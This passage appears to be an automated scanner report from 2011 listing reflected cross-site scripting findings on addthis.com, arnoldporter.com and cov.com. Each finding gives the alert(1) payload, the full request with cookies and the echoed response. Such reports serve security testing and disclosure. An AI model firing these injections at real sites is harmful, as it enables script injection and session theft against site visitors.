The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 12d9b<script>alert(1)</script>893317d02a5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /bookmark.php12d9b<script>alert(1)</script>893317d02a5 HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Wed, 19 Jan 2011 15:26:41 GMT Server: Apache X-Powered-By: PHP/5.2.13 Set-Cookie: PHPSESSID=ukeipc25sb6n7ajap5tqd3fsa1; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 1473 Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Not found</title> <l ...[SNIP]... <strong>bookmark.php12d9b<script>alert(1)</script>893317d02a5</strong> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8866e"-alert(1)-"49ee98219f7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bookmark.php8866e"-alert(1)-"49ee98219f7 HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Wed, 19 Jan 2011 15:26:40 GMT Server: Apache X-Powered-By: PHP/5.2.13 Set-Cookie: PHPSESSID=tioju43rv1im39822nkpbqlp26; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 1447 Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Not found</title> <l ...[SNIP]... <script type="text/javascript"> var u = "/404/bookmark.php8866e"-alert(1)-"49ee98219f7"; if (typeof utmx != "undefined" && utmx('combination') != undefined) { u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination'); } if (window._gat) { var gaPageTracker = _gat._get ...[SNIP]...
4.56. http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.addthis.com
Path: /bookmark.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4591f"-alert(1)-"57e0244f404 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bookmark.php/4591f"-alert(1)-"57e0244f404 HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 15:26:38 GMT Server: Apache X-Powered-By: PHP/5.2.13 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/ Content-Length: 92401
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AddThis Social Bookm ...[SNIP]... <script type="text/javascript"> var u = "/bookmark.php/4591f"-alert(1)-"57e0244f404"; if (typeof utmx != "undefined" && utmx('combination') != undefined) { u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination'); } if (window._gat) { var gaPageTracker = _gat._get ...[SNIP]...
4.57. http://www.arnoldporter.com/practices.cfm [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.arnoldporter.com
Path: /practices.cfm
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32e6e"><script>alert(1)</script>277857ca11c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /practices.cfm?u=FinancialServices&action=view&id=476&32e6e"><script>alert(1)</script>277857ca11c=1 HTTP/1.1 Host: www.arnoldporter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:28:14 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
The value of the u request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8e37"><script>alert(1)</script>b1acff3e126 was submitted in the u parameter. This input was echoed as e8e37\"><script>alert(1)</script>b1acff3e126 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /practices.cfm?u=FinancialServicese8e37"><script>alert(1)</script>b1acff3e126&action=view&id=476 HTTP/1.1 Host: www.arnoldporter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:27:36 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
4.59. http://www.arnoldporter.com/publications.cfm [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.arnoldporter.com
Path: /publications.cfm
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59ef8"><script>alert(1)</script>f0da3e29c6c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /publications.cfm?action=search&search_publication_type_id=advisory&59ef8"><script>alert(1)</script>f0da3e29c6c=1 HTTP/1.1 Host: www.arnoldporter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:27:56 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
4.60. http://www.cov.com/about_the_firm/firm_history [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.cov.com
Path: /about_the_firm/firm_history
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b3824'-alert(1)-'1b19dddffc8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /about_the_firm/firm_history?b3824'-alert(1)-'1b19dddffc8=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html> <head> <title id="ctl00_htmlTitle">Covington & Burling LLP | About the Firm | Firm History</title> <meta na ...[SNIP]... about_the_firm/firm_history/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/about_the_firm/firm_history/AboutSection.aspx?b3824'-alert(1)-'1b19dddffc8=1';//]]> ...[SNIP]...
4.61. http://www.cov.com/balancingworkandfamilylife [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.cov.com
Path: /balancingworkandfamilylife
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ec112'-alert(1)-'d654b8e90b6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /balancingworkandfamilylife?ec112'-alert(1)-'d654b8e90b6=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
4.62. http://www.cov.com/bestviewed [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.cov.com
Path: /bestviewed
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e18d5'-alert(1)-'b19132c4a4f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bestviewed?e18d5'-alert(1)-'b19132c4a4f=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
4.63. http://www.cov.com/biographies [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.cov.com
Path: /biographies
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c3b19'-alert(1)-'10a178ca3f5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /biographies?c3b19'-alert(1)-'10a178ca3f5=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
4.64. http://www.cov.com/diversityoverview [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.cov.com
Path: /diversityoverview
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8c748'-alert(1)-'750bc24037f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /diversityoverview?8c748'-alert(1)-'750bc24037f=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
4.65. http://www.cov.com/diversityupdate [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.cov.com
Path: /diversityupdate
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c2d31'-alert(1)-'bf8e984b8ec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /diversityupdate?c2d31'-alert(1)-'bf8e984b8ec=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
4.66. http://www.cov.com/extranet [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.cov.com
Path: /extranet
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6f529'-alert(1)-'c70c33782c6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /extranet?6f529'-alert(1)-'c70c33782c6=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
4.67. http://www.cov.com/firmoverview [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.cov.com
Path: /firmoverview
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9d58f'-alert(1)-'8538235fe28 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /firmoverview?9d58f'-alert(1)-'8538235fe28=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html> <head> <title id="ctl00_htmlTitle">Covington & Burling LLP | About the Firm | Firm Overview</title> <meta n ...[SNIP]... ocument.aspnetForm.action = '/firmoverview/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/firmoverview/AboutSection.aspx?9d58f'-alert(1)-'8538235fe28=1';//]]> ...[SNIP]...
4.68. http://www.cov.com/forum [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.cov.com
Path: /forum
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cb6be'-alert(1)-'7a5f32d74e6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /forum?cb6be'-alert(1)-'7a5f32d74e6=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
4.69. http://www.cov.com/honorsrankings [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.cov.com
Path: /honorsrankings
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f4088'-alert(1)-'6fb7096a36d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /honorsrankings?f4088'-alert(1)-'6fb7096a36d=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
4.70. http://www.cov.com/leadersindiversity [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.cov.com
Path: /leadersindiversity
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1cac5'-alert(1)-'90719ebe248 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /leadersindiversity?1cac5'-alert(1)-'90719ebe248=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
4.71. http://www.cov.com/legalnotices [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.cov.com
Path: /legalnotices
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a0792'-alert(1)-'83d5d12175f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /legalnotices?a0792'-alert(1)-'83d5d12175f=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
4.72. http://www.cov.com/mclarty [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.cov.com
Path: /mclarty
Issue detail
